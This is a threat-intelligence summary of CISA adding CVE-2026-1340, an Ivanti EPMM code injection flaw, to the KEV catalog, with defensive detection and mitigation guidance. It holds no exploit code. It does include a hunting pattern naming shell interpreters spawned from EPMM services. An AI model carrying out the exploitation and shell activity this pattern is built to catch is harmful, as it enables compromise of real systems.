Skip to content
.ca
sign in
3 minhigh

CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added CVE-2026-1340, a code injection vulnerability in Ivanti Endpoint Manager Mobile (EPMM), to its Known Exploited Vulnerabilities (KEV) Catalog due to evidence of active exploitation. All organizations, especially federal agencies under BOD 22-01, are strongly urged to prioritize timely remediation to protect their networks against active threats.

Sens:ImmediateConf:highAnalyzed:2026-04-08reports

Authors: CISA

CVE-2026-1340Code InjectionIvanti EPMMKEV Catalog

Source:CISA

Key Takeaways

  • CISA has added CVE-2026-1340 to the Known Exploited Vulnerabilities (KEV) Catalog.
  • CVE-2026-1340 is a Code Injection vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM).
  • There is confirmed evidence of active exploitation of this vulnerability in the wild.
  • Federal Civilian Executive Branch (FCEB) agencies are mandated to remediate this vulnerability per BOD 22-01.

Affected Systems

  • Ivanti Endpoint Manager Mobile (EPMM)

Vulnerabilities (CVEs)

  • CVE-2026-1340

Attack Chain

Threat actors are actively exploiting CVE-2026-1340, a code injection vulnerability within Ivanti Endpoint Manager Mobile (EPMM). While specific exploit chains are not detailed in the alert, successful exploitation of code injection vulnerabilities typically allows an attacker to execute arbitrary commands or payloads on the target system, potentially leading to full system compromise, persistence, and lateral movement.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

N/A

Detection Engineering Assessment

EDR Visibility: Medium — EDR solutions may not detect the initial web-based code injection exploit itself, but are highly likely to detect subsequent anomalous child processes or shell executions spawning from the Ivanti EPMM service. Network Visibility: Medium — Network sensors and WAFs can potentially detect the exploit payload if signatures are available, as well as any subsequent outbound command and control (C2) traffic. Detection Difficulty: Moderate — Detecting the specific exploit requires application-layer visibility or WAF rules, but post-exploitation activity should be visible via standard endpoint behavioral monitoring.

Required Log Sources

  • Web Application Firewall (WAF) logs
  • Application logs (Ivanti EPMM)
  • Endpoint process execution logs (Event ID 4688 / Sysmon Event ID 1)

Hunting Hypotheses

HypothesisTelemetryATT&CK StageFP Risk
Look for unexpected child processes (e.g., cmd.exe, powershell.exe, sh, bash) spawning directly from the Ivanti EPMM web or application services, indicating successful code injection and execution.Process creation logsExecutionLow

Control Gaps

  • Delayed patch management for public-facing infrastructure
  • Lack of application-layer monitoring and WAF enforcement

Key Behavioral Indicators

  • Anomalous child processes originating from Ivanti EPMM services
  • Unexpected outbound network connections originating from the EPMM server to unknown external IP addresses

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Apply the vendor-supplied patch or mitigation for CVE-2026-1340 to all Ivanti EPMM instances immediately.

Infrastructure Hardening

  • Restrict access to the Ivanti EPMM management interfaces to trusted internal networks or specific IP addresses.
  • Deploy and configure Web Application Firewall (WAF) rules to monitor and block suspicious requests targeting the EPMM server.

User Protection

  • N/A

Security Awareness

  • Ensure vulnerability management teams prioritize and track alerts originating from the CISA KEV catalog for immediate action.

MITRE ATT&CK Mapping

  • T1190 - Exploit Public-Facing Application
  • T1059 - Command and Scripting Interpreter

Related